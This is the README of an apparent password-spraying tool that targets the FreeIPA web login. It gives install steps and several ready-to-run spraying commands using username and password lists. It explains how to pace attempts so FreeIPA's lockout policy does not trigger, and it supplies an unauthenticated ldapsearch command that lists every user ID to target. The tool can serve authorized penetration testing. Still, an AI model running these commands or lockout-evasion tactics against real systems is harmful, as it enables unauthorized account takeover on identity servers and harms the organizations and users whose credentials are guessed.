A simple password spraying tool for FreeIPA web interface authentication (UI).
This tool is provided for educational and authorized security testing purposes only. The author is not responsible for any misuse of this software. Users are responsible for ensuring they have proper authorization before using this tool against any systems.
ACCOUNT LOCKOUT RISK: This tool can trigger account lockouts if used aggressively. FreeIPA's default lockout policy:
- Max failures: 6 attempts before account lockout
- Failure reset interval: 60 seconds (failure counter resets after 60s of no attempts)
- Lockout duration: 600 seconds (10 minutes) automatic unlock
RECOMMENDATIONS:
- Use delays of 61+ seconds between attempts (default) to reset failure counter
- Or limit attempts per user up to 5 or fewer to avoid lockouts
- If account locked and default policy is used, just wait 10 min to unlock it.
- Password spraying against FreeIPA web UI
- Support for single username or username list from file
- Support for single password or password list from file
- Configurable delays and timeouts
- Detailed logging and progress tracking
- CSRF token handling
- Session management
- Python 3.6+
- pip
python3 -m venv beerspray_env
source beerspray_env/bin/activate # On Windows: beerspray_env\Scripts\activate
pip install -r requirements.txtgit clone https://github.com/sickwell/BeerSpray
cd beerspray
pip3 install --user -r requirements.txtpython3 beerspray.py --url https://dc1.legion.realm --username admin --passwordlist passwords.txtpython3 beerspray.py --url https://dc1.legion.realm --username admin --password "password123"python3 beerspray.py --url https://dc1.legion.realm --userlist users.txt --password "password123"python3 beerspray.py --url https://dc1.legion.realm --userlist users.txt --passwordlist passwords.txtpython3 beerspray.py --url https://dc1.legion.realm --userlist users.txt --passwordlist passwords.txt --delay 30python3 beerspray.py --url https://dc1.legion.realm --username admin --passwordlist passwords.txt --tries 2python3 beerspray.py --url https://ipa.freeipadc.lab --userlist test_users.txt --password qazwsx123 --tries 1Here's an example of the beerspray.py script successfully finding a password:
By default, you can get a list of usernames without authentication using LDAP:
ldapsearch -x -H ldap://10.200.0.6 -b "dc=legion,dc=realm" "(uid=*)" uidThis command will return all user IDs from the FreeIPA LDAP directory.
--url: FreeIPA web interface URL (required)--username: Single username to test--userlist: File containing list of usernames (one per line)--password: Single password to test--passwordlist: File containing list of passwords (one per line)--delay: Delay between attempts in seconds (default: 61 to respect FreeIPA lockout policy)--max-retries: Maximum number of retries per attempt (default: 3)--tries: Maximum number of passwords to try per user (default: all passwords)--verify-ssl: Enable SSL certificate verification--output: File to save results
This project is licensed under the MIT License - see the LICENSE file for details.